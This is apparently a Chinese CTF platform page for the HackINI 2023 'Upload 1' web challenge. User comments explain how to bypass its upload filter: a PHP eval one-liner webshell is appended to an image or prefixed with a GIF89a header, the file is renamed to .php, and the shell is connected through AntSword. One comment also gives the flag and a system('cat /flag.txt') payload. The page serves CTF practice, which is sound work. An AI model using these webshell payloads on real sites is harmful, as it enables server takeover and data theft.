Upload 1WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: 18718578940
一血奖励: 0金币
解  决: 666
提  示:
描  述:
We added a verification. Bypass it. **Author**: souad
评论
pb9231 1年前

尝试上传图片文件,发现可以上传(图片要小), 用010 editor 打开图片将php一句话木马<?php @eval($_POST['shell']);?>写入图片末尾,保存后修改图片扩展名为.php 上传图片成功,用蚁剑连接,在根目录下找到flag.txt

回复 0
vanfor 1年前

@TheShy师傅 内容太长了被过滤掉了

回复 0

TheShy师傅 1年前

为什么我一上传就显示页面丢失,什么都不返回给我?无论是什么免杀木马都不行?

回复 1

cqy123 1年前

上传了一个很小的图片,然后抓包,图片内容的头不要动,后面加入一句话木马,乙箭链接

回复 0

.⎛⎝•̀ω•́⎠⎞. 1年前

改改文件头就行

回复 0

ekkoyu 1年前

?的,只能上传一个小小的图片?

回复 0

FADogeCTF 1年前

制作图片马,直接以php文件上传就可以连接webshell

回复 0

868954104 1年前

shellmates{PoLyg10t_F1l3s_Byp4$S} GIF89a <?php system('cat /flag.txt')?>

回复 0

lolthis223 1年前

直接在你的php函数上面加一个GIF89a就可以上传了

回复 1

不会编程的崽 1年前

File too large, this service is meant for small files only 这图片要求的多小啊

回复 0

tcstwz 2年前

也可以加文件头

回复 0

xiaobai568 2年前

构造图片马之后,将后缀改为php就能连上了

回复 1

WriteUp

image
yangbo

2 金币

评分(1)

解题动态

orange2015 攻破了该题 8小时前
不上早八 攻破了该题 2天前
VIP784 攻破了该题 3天前
孙燕姿圈外男友 攻破了该题 3天前
ah990330230 攻破了该题 3天前
901548546 攻破了该题 4天前
34445230 攻破了该题 4天前
tdwj 攻破了该题 4天前
XiaoYeCM 攻破了该题 4天前
5032894 攻破了该题 5天前
88788 攻破了该题 5天前
daqindiguo 攻破了该题 7天前
tcqctf 攻破了该题 7天前
无敌霸王龙 攻破了该题 8天前
mhxiaobai 攻破了该题 8天前
NiceNorth 攻破了该题 8天前
theicer01 攻破了该题 11天前
17807032991 攻破了该题 11天前
zdevelop 攻破了该题 11天前
xiayanting 攻破了该题 12天前
问题反馈